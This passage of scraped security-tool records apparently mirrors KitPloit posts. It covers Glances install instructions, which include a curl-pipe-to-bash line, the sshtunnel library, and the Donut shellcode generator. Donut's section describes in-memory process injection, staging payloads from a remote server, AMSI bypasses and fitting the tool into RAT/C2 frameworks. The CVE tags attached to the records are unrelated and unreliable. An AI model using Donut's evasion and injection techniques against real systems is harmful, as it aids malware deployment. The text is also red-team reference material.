\n * ` wifi ` (for the wifi plugin) [Linux-only] \n * ` zeroconf ` (for the autodiscover mode) \n_ Note for Python 2.6 users _ \nGlances no longer supports Python 2.6. Please upgrade to a minimum Python version of 2.7/3.4+ or downgrade to Glances 2.6.2 (last version with Python 2.6 support). \n_ Note for CentOS Linux 6 and 7 users _ \nPython 2.7 and 3.4 are now available via SCL repositories. See: [ https://lists.centos.org/pipermail/centos-announce/2015-December/021555.html ](<https://lists.centos.org/pipermail/centos-announce/2015-December/021555.html> \"https://lists.centos.org/pipermail/centos-announce/2015-December/021555.html\" ) . \n \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(15\\)\" ) \n** Installation ** \nThere are several methods to test/install Glances on your system. Choose your weapon! \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(16\\)\" ) \n** Glances Auto Install script: the total way ** \nTo install both dependencies and the latest Glances production ready version (aka _ master _ branch), just enter the following command line: \n\n \n \n curl -L https://bit.ly/glances | /bin/bash\n\nor \n\n \n \n wget -O- https://bit.ly/glances | /bin/bash\n\n_ Note _ : This is only supported on some GNU/Linux distributions and Mac OS X. If you want to support other distributions, please contribute to [ glancesautoinstall ](<https://github.com/nicolargo/glancesautoinstall> \"glancesautoinstall\" ) . \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(18\\)\" ) \n** PyPI: The simple way ** \nGlances is on ` PyPI ` . By using PyPI, you will be using the latest stable version. \nTo install, simply use ` pip ` : \n\n \n \n pip install glances\n\n_ Note _ : Python headers are required to install [ psutil ](<https://github.com/giampaolo/psutil> \"psutil\" ) . For example, on Debian/Ubuntu you need to install first the _ python-dev _ package. For Fedora/CentOS/RHEL install first _ python-devel _ package. For Windows, just install psutil from the binary installation file. \n_ Note 2 (for the Wifi plugin) _ : If you want to use the Wifi plugin, you need to install the _ wireless-tools _ package on your system. \nYou can also install the following libraries in order to use optional features (like the Web interface, exports modules...): \n\n \n \n pip install 'glances[action,browser,cloud,cpuinfo,docker,export,folders,gpu,graph,ip,raid,snmp,web,wifi]'\n\nTo upgrade Glances to the latest version: \n\n \n \n pip install --upgrade glances\n pip install --upgrade glances[...]\n\nIf you need to install Glances in a specific user location, use: \n\n \n \n export PYTHONUSERBASE=~/mylocalpath\n pip install --user glances\n\n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(20\\)\" ) \n** Docker: the funny way ** \nA Glances [ container ](<https://www.kitploit.com/search/label/Container> \"container\" ) is available. It includes the latest development HEAD version. You can use it to monitor your server and all your other containers! \nGet the Glances container: \n\n \n \n docker pull nicolargo/glances\n\nRun the container in _ console mode _ : \n\n \n \n docker run --rm -v /var/run/docker.sock:/var/run/docker.sock:ro --pid host --network host -it docker.io/nicolargo/glances\n\nAdditionally, if you want to use your own glances.conf file, you can create your own Dockerfile: \n\n \n \n FROM nicolargo/glances\n COPY glances.conf /glances/conf/glances.conf\n CMD python -m glances -C /glances/conf/glances.conf $GLANCES_OPT\n\nAlternatively, you can specify something along the same lines with docker run options: \n\n \n \n docker run -v `pwd`/glances.conf:/glances/conf/glances.conf -v /var/run/docker.sock:/var/run/docker.sock:ro --pid host -it docker.io/nicolargo/glances\n\nWhere `pwd`/glances.conf is a local directory containing your glances.conf file. \nRun the container in _ Web server mode _ (notice the GLANCES_OPT environment variable setting parameters for the glances startup command): \n\n \n \n docker run -d --restart=\"always\" -p 61208-61209:61208-61209 -e GLANCES_OPT=\"-w\" -v /var/run/docker.sock:/var/run/docker.sock:ro --pid host docker.io/nicolargo/glances\n\n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(22\\)\" ) \n** GNU/Linux ** \nGlances is available on many Linux distributions, so you should be able to install it using your favorite package manager. Be aware that when you use this method the operating system [ package ](<https://repology.org/metapackage/glances/packages> \"package\" ) for Glances may not be the latest version. \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(24\\)\" ) \n** FreeBSD ** \nTo install the binary package: \n\n \n \n # pkg install py27-glances\n\nTo install Glances from ports: \n\n \n \n # cd /usr/ports/sysutils/py-glances/\n # make install clean\n\n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(25\\)\" ) \n** macOS ** \nIf you do not want to use the glancesautoinstall script, follow this procedure. \nmacOS users can install Glances using ` Homebrew ` or ` MacPorts ` . \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(26\\)\" ) \n** Homebrew ** \n\n \n \n $ brew install glances\n\n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(27\\)\" ) \n** MacPorts ** \n\n \n \n $ sudo port install glances\n\n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(28\\)\" ) \n** Windows ** \nInstall [ Python ](<https://www.python.org/getit/> \"Python\" ) for Windows (Python 2.7.9+ and 3.4+ ship with pip) and then run the following command: \n\n \n \n $ pip install glances\n\nAlternatively, you could clone the repository and install with the following command. \n\n \n \n $ git clone https://github.com/nicolargo/glances.git\n $ cd glances\n $ python setup.py install\n\n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(30\\)\" ) \n** Android ** \nYou need a rooted device and the [ Termux ](<https://play.google.com/store/apps/details?id=com.termux> \"Termux\" ) application (available on the Google Play Store). \nStart Termux on your device and enter: \n\n \n \n $ apt update\n $ apt upgrade\n $ apt install clang python python-dev\n $ pip install bottle\n $ pip install glances\n\nAnd start Glances: \n\n \n \n $ glances\n\nYou can also run Glances in server mode (-s or -w) in order to remotely monitor your [ Android ](<https://www.kitploit.com/search/label/Android> \"Android\" ) device. \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(33\\)\" ) \n** Source ** \nTo install Glances from source: \n\n \n \n $ wget https://github.com/nicolargo/glances/archive/vX.Y.tar.gz -O - | tar xz\n $ cd glances-*\n # python setup.py install\n\n_ Note _ : Python headers are required to install psutil. \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(34\\)\" ) \n** Chef ** \nAn awesome ` Chef ` cookbook is available to monitor your infrastructure: [ https://supermarket.chef.io/cookbooks/glances ](<https://supermarket.chef.io/cookbooks/glances> \"https://supermarket.chef.io/cookbooks/glances\" ) (thanks to Antoine Rouyer) \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(36\\)\" ) \n** Puppet ** \nYou can install Glances using ` Puppet ` : [ https://github.com/rverchere/puppet-glances ](<https://github.com/rverchere/puppet-glances> \"https://github.com/rverchere/puppet-glances\" ) \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(38\\)\" ) \n** Ansible ** \nA Glances ` Ansible ` role is available: [ https://galaxy.ansible.com/zaxos/glances-ansible-role/ ](<https://galaxy.ansible.com/zaxos/glances-ansible-role/> \"https://galaxy.ansible.com/zaxos/glances-ansible-role/\" ) \n \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(40\\)\" ) \n** Usage ** \nFor the standalone mode, just run: \n\n \n \n $ glances\n\nFor the Web server mode, run: \n\n \n \n $ glances -w\n\nand enter the URL ` http://<ip>:61208 ` in your favorite web browser. \nFor the client/server mode, run: \n\n \n \n $ glances -s\n\non the server side and run: \n\n \n \n $ glances -c <ip>\n\non the client one. \nYou can also detect and display all Glances servers available on your network or defined in the configuration file: \n\n \n \n $ glances --browser\n\nYou can also display raw stats on stdout: \n\n \n \n $ glances --stdout cpu.user,mem.used,load\n cpu.user: 30.7\n mem.used: 3278204928\n load: {'cpucore': 4, 'min1': 0.21, 'min5': 0.4, 'min15': 0.27}\n cpu.user: 3.4\n mem.used: 3275251712\n load: {'cpucore': 4, 'min1': 0.19, 'min5': 0.39, 'min15': 0.27}\n ...\n\nor in a CSV format thanks to the stdout-csv option: \n\n \n \n $ glances --stdout-csv now,cpu.user,mem.used,load\n now,cpu.user,mem.used,load.cpucore,load.min1,load.min5,load.min15\n 2018-12-08 22:04:20 CEST,7.3,5948149760,4,1.04,0.99,1.04\n 2018-12-08 22:04:23 CEST,5.4,5949136896,4,1.04,0.99,1.04\n ...\n\nand RTFM, always. \n \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(41\\)\" ) \n** Documentation ** \nFor complete documentation have a look at the [ readthedocs ](<https://glances.readthedocs.io/> \"readthedocs\" ) website. \nIf you have any question (after RTFM!), please post it on the official Q&A [ forum ](<https://groups.google.com/forum/?hl=en#!forum/glances-users> \"forum\" ) . \n \n[ ](<https://draft.blogger.com/null> \"Glances an Eye on your system. A top/htop alternative for GNU/Linux, BSD, Mac OS and Windows operating systems. \\(44\\)\" ) \n** Gateway to other services ** \nGlances can export stats to: ` CSV ` file, ` JSON ` file, ` InfluxDB ` , ` Cassandra ` , ` CouchDB ` , ` OpenTSDB ` , ` Prometheus ` , ` StatsD ` , ` ElasticSearch ` , ` RabbitMQ/ActiveMQ ` , ` ZeroMQ ` , ` Kafka ` , ` Riemann ` and ` RESTful ` server. \n \n** Author ** \nNicolas Hennion (@nicolargo) < [email protected] > \n \n \n\n\n** [ Download Glances ](<https://github.com/nicolargo/glances> \"Download Glances\" ) **\n", "edition": 59, "modified": "2019-11-24T12:27:05", "published": "2019-11-24T12:27:05", "id": "KITPLOIT:3469433413144971329", "href": "http://www.kitploit.com/2019/11/glances-eye-on-your-system-tophtop.html", "title": "Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-02T17:26:07", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/-keQfkiMI1L8/XdYFJgcz_kI/AAAAAAAAQ6U/xXAc6q7DJg8iRcDMveXZUweQ5MwpuVDHACNcBGAsYHQ/s1600/ssh-local.png>)\n\n \nInspired by [ https://github.com/jmagnusson/bgtunnel ](<https://github.com/jmagnusson/bgtunnel> \"https://github.com/jmagnusson/bgtunnel\" ) , which doesn't work on Windows. \nSee also: [ https://github.com/paramiko/paramiko/blob/master/demos/forward.py ](<https://github.com/paramiko/paramiko/blob/master/demos/forward.py> \"https://github.com/paramiko/paramiko/blob/master/demos/forward.py\" ) \n \n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(12\\)\" ) \n** Requirements ** \n\n\n * [ paramiko ](<http://www.paramiko.org/> \"paramiko\" )\n\n \n\n\n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(14\\)\" ) \n** Installation ** \n[ sshtunnel ](<https://pypi.python.org/pypi/sshtunnel> \"sshtunnel\" ) is on PyPI, so simply run: \n\n \n \n pip install sshtunnel\n\nor \n\n \n \n easy_install sshtunnel\n\nor \n\n \n \n conda install -c conda-forge sshtunnel\n\nto have it installed in your environment. \nFor installing from source, clone the [ repo ](<https://github.com/pahaz/sshtunnel> \"repo\" ) and run: \n\n \n \n python setup.py install\n\n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(17\\)\" ) \n** Testing the package ** \nIn order to run the tests you first need [ tox ](<https://testrun.org/tox/latest/> \"tox\" ) and run: \n\n \n \n python setup.py test\n\n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(19\\)\" ) \n** Usage scenarios ** \nOne of the typical scenarios where ` sshtunnel ` is helpful is depicted in the figure below. User may need to connect a port of a remote server (i.e. 8080) where only SSH port (usually port 22) is reachable. \n\n \n \n ----------------------------------------------------------------------\n \n |\n -------------+ | +----------+\n LOCAL | | | REMOTE | :22 SSH\n CLIENT | <== SSH ========> | SERVER | :8080 web service\n -------------+ | +----------+\n |\n FIREWALL (only port 22 is open)\n \n ----------------------------------------------------------------------\n\n** Fig1 ** : How to connect to a service blocked by a [ firewall ](<https://www.kitploit.com/search/label/Firewall> \"firewall\" ) through SSH tunnel. \nIf allowed by the SSH server, it is also possible to reach a private server (from the perspective of ` REMOTE SERVER ` ) not directly visible from the outside ( ` LOCAL CLIENT ` 's perspective). \n\n \n \n ----------------------------------------------------------------------\n \n |\n -------------+ | +----------+ +---------\n LOCAL | | | REMOTE | | PRIVATE\n CLIENT | <== SSH ========> | SERVER | <== local ==> | SERVER\n -------------+ | +----------+ +---------\n |\n FIREWALL (only port 443 is open)\n \n ----------------------------------------------------------------------\n\n** Fig2 ** : How to connect to ` PRIVATE SERVER ` through SSH tunnel. \n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(21\\)\" ) \n** Usage examples ** \nAPI allows either initializing the tunnel and starting it or using a ` with ` context, which will take care of starting ** and stopping ** the tunnel: \n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(22\\)\" ) \n** Example 1 ** \nCode corresponding to ** Fig1 ** above follows, given remote server's address is ` pahaz.urfuclub.ru ` , password authentication and randomly assigned local bind port. \n\n \n \n from sshtunnel import SSHTunnelForwarder\n \n server = SSHTunnelForwarder(\n 'pahaz.urfuclub.ru',\n ssh_username=\"pahaz\",\n ssh_password=\"secret\",\n remote_bind_address=('127.0.0.1', 8080)\n )\n \n server.start()\n \n print(server.local_bind_port) # show assigned local port\n # work with `SECRET SERVICE` through `server.local_bind_port`.\n \n server.stop()\n\n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(23\\)\" ) \n** Example 2 ** \nExample of a [ port forwarding ](<https://www.kitploit.com/search/label/Port%20Forwarding> \"port forwarding\" ) to a private server not directly reachable, assuming password protected pkey authentication, remote server's SSH service is listening on port 443 and that port is open in the firewall ( ** Fig2 ** ): \n\n \n \n import paramiko\n import sshtunnel\n \n with sshtunnel.open_tunnel(\n (REMOTE_SERVER_IP, 443),\n ssh_username=\"\",\n ssh_pkey=\"/var/ssh/rsa_key\",\n ssh_private_key_password=\"secret\",\n remote_bind_address=(PRIVATE_SERVER_IP, 22),\n local_bind_address=('0.0.0.0', 10022)\n ) as tunnel:\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect('127.0.0.1', 10022)\n # do some operations with client session\n client.close()\n \n print('FINISH!')\n\n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(25\\)\" ) \n** Example 3 ** \nExample of a port forwarding for the Vagrant [ MySQL ](<https://www.kitploit.com/search/label/MySQL> \"MySQL\" ) local port: \n\n \n \n from sshtunnel import open_tunnel\n from time import sleep\n \n with open_tunnel(\n ('localhost', 2222),\n ssh_username=\"vagrant\",\n ssh_password=\"vagrant\",\n remote_bind_address=('127.0.0.1', 3306)\n ) as server:\n \n print(server.local_bind_port)\n while True:\n # press Ctrl-C for stopping\n sleep(1)\n \n print('FINISH!')\n\nOr simply using the CLI: \n\n \n \n (bash)$ python -m sshtunnel -U vagrant -P vagrant -L :3306 -R 127.0.0.1:3306 -p 2222 localhost\n\n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(27\\)\" ) \n** Example 4 ** \nOpening an SSH session jumping over two tunnels. SSH transport and tunnels will be daemonised, which will not wait for the connections to stop at close time. \n\n \n \n import sshtunnel\n from paramiko import SSHClient\n \n \n with sshtunnel.open_tunnel(\n ssh_address_or_host=('GW1_ip', 20022),\n remote_bind_address=('GW2_ip', 22),\n block_on_close=False\n ) as tunnel1:\n print('Connection to tunnel1 (GW1_ip:GW1_port) OK...')\n with sshtunnel.open_tunnel(\n ssh_address_or_host=('localhost', tunnel1.local_bind_port),\n remote_bind_address=('target_ip', 22),\n ssh_username='GW2_user',\n ssh_password='GW2_pwd',\n block_on_close=False\n ) as tunnel2:\n print('Connection to tunnel2 (GW2_ip:GW2_port) OK...')\n with SSHClient() as ssh:\n ssh.connect('localhost',\n port=tunnel2.local_bind_port,\n username='target_user',\n password='target_pwd',\n )\n ssh.exec_command(...)\n\n[ ](<https://draft.blogger.com/null> \"SSH tunnels to remote server. \\(28\\)\" ) \n** CLI usage ** \n\n \n \n $ sshtunnel --help\n usage: sshtunnel [-h] [-U SSH_USERNAME] [-p SSH_PORT] [-P SSH_PASSWORD] -R\n IP:PORT [IP:PORT ...] [-L [IP:PORT [IP:PORT ...]]]\n [-k SSH_HOST_KEY] [-K KEY_FILE] [-S KEY_PASSWORD] [-t] [-v]\n [-V] [-x IP:PORT] [-c SSH_CONFIG_FILE] [-z] [-n] [-d [FOLDER [FOLDER ...]]]\n ssh_address\n \n Pure python ssh tunnel utils\n Version 0.1.5\n \n positional arguments:\n ssh_address SSH server IP address (GW for SSH tunnels)\n set with \"-- ssh_address\" if immediately after -R or -L\n \n optional arguments:\n -h, --help show this help message and exit\n -U SSH_USERNAME, --username SSH_USERNAME\n SSH server account username\n -p SSH_PORT, --server_port SSH_PORT\n SS H server TCP port (default: 22)\n -P SSH_PASSWORD, --password SSH_PASSWORD\n SSH server account password\n -R IP:PORT [IP:PORT ...], --remote_bind_address IP:PORT [IP:PORT ...]\n Remote bind address sequence: ip_1:port_1 ip_2:port_2 ... ip_n:port_n\n Equivalent to ssh -Lxxxx:IP_ADDRESS:PORT\n If port is omitted, defaults to 22.\n Example: -R 10.10.10.10: 10.10.10.10:5900\n -L [IP:PORT [IP:PORT ...]], --local_bind_address [IP:PORT [IP:PORT ...]]\n Local bind address sequence: ip_1:port_1 ip_2:port_2 ... ip_n:port_n\n Elements may also be valid UNIX socket domains:\n /tmp/foo.sock /tmp/bar.sock ... /tmp/baz.sock\n Equivalent to ssh -LPORT:xxxxxxxxx:xxxx, being the local IP address optional.\n By default it will listen in all interfaces (0.0.0.0) and choose a random port.\n Example: -L :40000\n -k SSH_HOST_KEY, --ssh_host_key SSH_HOST_KEY\n Gateway's host key\n -K KEY_FILE, --private_key_file KEY_FILE\n RSA/DSS/ECDSA private key file\n -S KEY_PASSWORD, --private_key_password KEY_PASSWORD\n RSA/DSS/ECDSA private key password\n -t, --threaded Allow concurrent connections to each tunnel\n -v, --verbose Increase output verbosity (default: ERROR)\n -V, --version Show version number and quit\n -x IP:PORT, --proxy IP:PORT\n IP and port of SSH proxy to destination\n -c SSH_CONFIG_FILE, --config SSH_CONFIG_FILE\n SSH configuration file, defaults to ~/.ssh/config\n -z, --compress Request server for c ompression over SSH transport\n -n, --noagent Disable looking for keys from an SSH agent\n -d [FOLDER [FOLDER ...]], --host_pkey_directories [FOLDER [FOLDER ...]]\n List of directories where SSH pkeys (in the format `id_*`) may be found\n\n \n \n\n\n** [ Download Sshtunnel ](<https://github.com/pahaz/sshtunnel> \"Download Sshtunnel\" ) **\n", "edition": 12, "modified": "2019-11-24T22:00:00", "published": "2019-11-24T22:00:00", "id": "KITPLOIT:3762050936406645471", "href": "http://www.kitploit.com/2019/11/sshtunnel-ssh-tunnels-to-remote-server.html", "title": "Sshtunnel - SSH Tunnels To Remote Server", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T20:27:12", "bulletinFamily": "tools", "cvelist": ["CVE-2018-13379"], "description": "[  ](<https://1.bp.blogspot.com/--6Tt6K0NGT8/XbT2ZoN_87I/AAAAAAAAQv0/nCHhLIhZrcEkb_6t1zbSpX9RSVCvTfjHACNcBGAsYHQ/s1600/donut_1_donut.png>)\n\n \nDonut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. \nIt can be used in several ways. \n \n** As a Standalone Tool ** \nDonut can be used as-is to generate shellcode from VBS/JS/EXE/DLL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for loader generation. The Python documentation can be found [ here ](<https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md> \"here\" ) . The command-line syntax is as described below. \n\n \n \n usage: donut [options] -f <EXE/DLL/VBS/JS>\n \n -MODULE OPTIONS-\n \n -f <path> .NET assembly, EXE, DLL, VBS, JS file to execute in-memory.\n -n <name> Module name. Randomly generated by default.\n -u <URL> HTTP server that will host the donut module.\n \n -PIC/SHELLCODE OPTIONS-\n \n -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).\n -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)\n -o <loader> Output file. Default is \"loader.bin\"\n -e Encode output file with Base64. (Will be copied to clipboard on Windows)\n -t Run entrypoint for unmanaged EXE as a new thread. (replaces ExitProcess with ExitThread in IAT)\n -x Call RtlExitUserPr ocess to terminate the host process. (RtlExitUserThread is called by default)\n \n -DOTNET OPTIONS-\n \n -c <namespace.class> Optional class name. (required for .NET DLL)\n -m <method | api> Optional method or API name for DLL. (a method is required for .NET DLL)\n -p <parameters> Optional parameters inside quotations.\n -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.\n -d <name> AppDomain name to create for .NET. Randomly generated by default.\n \n examples:\n \n donut -f c2.dll\n donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll\n donut -f loader.dll -c TestClass -m RunProcess -p\"calc notepad\" -u http://remote_server.com/modules/\n\n \n** Building Donut ** \nTags have been provided for each release version of donut that contain the compiled executables. \n\n\n * v0.9.2, Bear Claw: [ https://github.com/TheWover/donut/releases/tag/v0.9.2 ](<https://github.com/TheWover/donut/releases/tag/v0.9.2> \"https://github.com/TheWover/donut/releases/tag/v0.9.2\" )\n * v0.9.2 Beta: [ https://github.com/TheWover/donut/releases/tag/v0.9.2 ](<https://github.com/TheWover/donut/releases/tag/v0.9.2> \"https://github.com/TheWover/donut/releases/tag/v0.9.2\" )\n * v0.9.1, Apple Fritter: [ https://github.com/TheWover/donut/releases/tag/v0.9.1 ](<https://github.com/TheWover/donut/releases/tag/v0.9.1> \"https://github.com/TheWover/donut/releases/tag/v0.9.1\" )\n * v0.9, Initial Release: [ https://github.com/TheWover/donut/releases/tag/v0.9 ](<https://github.com/TheWover/donut/releases/tag/v0.9> \"https://github.com/TheWover/donut/releases/tag/v0.9\" )\nHowever, you may also clone and build the source yourself using the provided makefiles. \n \n** Building From Repository ** \nFrom a Windows command prompt or Linux terminal, clone the repository and change to the donut directory. \n\n \n \n git clone http://github.com/thewover/donut\n cd donut\n\n \n** Linux ** \nSimply run make to generate an executable, static and dynamic libraries. \n\n \n \n make\n make clean\n make debug\n\n \n** Windows ** \nStart a [ Microsoft ](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Visual Studio Developer Command Prompt and ` cd ` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ` -f Makefile.msvc ` . The makefile provides the following commmands to build donut: \n\n \n \n nmake -f Makefile.msvc\n nmake clean -f Makefile.msvc\n nmake debug -f Makefile.msvc\n\n \n** As a Library ** \ndonut can be compiled as both dynamic and static libraries for both Linux ( _ .a _ / _ .so _ ) and Windows( _ .lib _ / _ .dll _ ). It has a simple API that is described in _ docs/api.html _ . Two exported functions are provided: ` int DonutCreate(PDONUT_CONFIG c) ` and ` int DonutDelete(PDONUT_CONFIG c) ` . \n \n** As a Python Module ** \nDonut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3. \n\n \n \n pip install .\n\nOtherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory. \n\n \n \n pip install donut-shellcode\n\n \n** As a Template - Rebuilding the shellcode ** \n_ loader/ _ contains the in-memory execution code for EXE/DLL/VBS/JS and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and MinGW-w64. Make files have been provided for both compilers. Whenever files in the loader directory have been changed, recompiling for all architectures is recommended before rebuilding donut. \n \n** Microsoft Visual Studio ** \n** Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later. ** \nOpen the x64 Microsoft Visual Studio build environment, switch to the _ loader _ directory, and type the following: \n\n \n \n nmake clean -f Makefile.msvc\n nmake -f Makefile.msvc\n\nThis should generate a 64-bit executable ( _ loader.exe _ ) from _ loader.c _ . exe2h will then extract the shellcode from the _ .text _ segment of the PE file and save it as a C array to _ loader_exe_x64.h _ . When donut is rebuilt, this new shellcode will be used for all loaders that it generates. \nTo generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the loader directory, and type the following: \n\n \n \n nmake clean -f Makefile.msvc\n nmake x86 -f Makefile.msvc\n\nThis will save the shellcode as a C array to _ loader_exe_x86.h _ . \n \n** MinGW-W64 ** \nAssuming you're on Linux and _ MinGW-W64 _ has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the _ loader _ directory and type the following: \n\n \n \n make clean -f Makefile.mingw\n make -f Makefile.mingw\n\nOnce you've recompiled for all architectures, you may rebuild donut. \n \n** Bypasses ** \nDonut includes a bypass system for AMSI and other security features. Currently we bypass: \n\n\n * AMSI in .NET v4.8 \n * Device Guard policy preventing dynamicly generated code from executing \nYou may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c. \nEach bypass implements the DisableAMSI fuction with the signature ` BOOL DisableAMSI(PDONUT_INSTANCE inst) ` , and comes with a corresponding preprocessor directive. We have several ` #if defined ` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ` BYPASS_AMSI_A ` . If donut is built with that variable defined, then that bypass will be used. \nWhy do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using. \nAnother benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ` if defined ` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined. \nIf you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. \nOdzhan wrote a [ blog post ](<https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/> \"blog post\" ) on the details of our AMSI bypass research. \n \n** Additional features. ** \nThese are left as exercises to the reader. I would personally recommend: \n\n\n * Add environmental keying \n * Make donut polymorphic by obfuscating _ loader _ every time shellcode is generated \n * Integrate donut as a module into your favorite RAT/C2 Framework \n \n** Disclaimers ** \n\n\n * No, we will not update donut to counter signatures or detections by any AV. \n * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR [ Injection ](<https://www.kitploit.com/search/label/Injection> \"Injection\" ) through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building [ analytics ](<https://www.kitploit.com/search/label/Analytics> \"analytics\" ) and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. \n \n** How it works ** \n \n** Procedure for Assemblies ** \nDonut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters. \nThe logic above describes how the shellcode generated by donut works. That logic is defined in _ loader.exe _ . To get the shellcode, _ exe2h _ extracts the compiled machine code from the _ .text _ segment in _ loader.exe _ and saves it as a C array to a C header file. _ donut _ combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). \nRefer to MSDN for documentation on the Undocumented CLR Hosting API: [ https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces ](<https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces> \"https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces\" ) \nFor a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: [ https://github.com/caseysmithrc/AssemblyLoader ](<https://github.com/caseysmithrc/AssemblyLoader> \"https://github.com/caseysmithrc/AssemblyLoader\" ) \nDetailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README. \n \n** Procedure for ActiveScript/XSL ** \nThe details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [ blog post ](<https://modexp.wordpress.com/2019/07/21/inmem-exec-script/> \"blog post\" ) . \n \n** Procedure for PE Loading ** \nThe details of how Donut loads PE files from memory have been detailed by Odzhan in a [ blog post 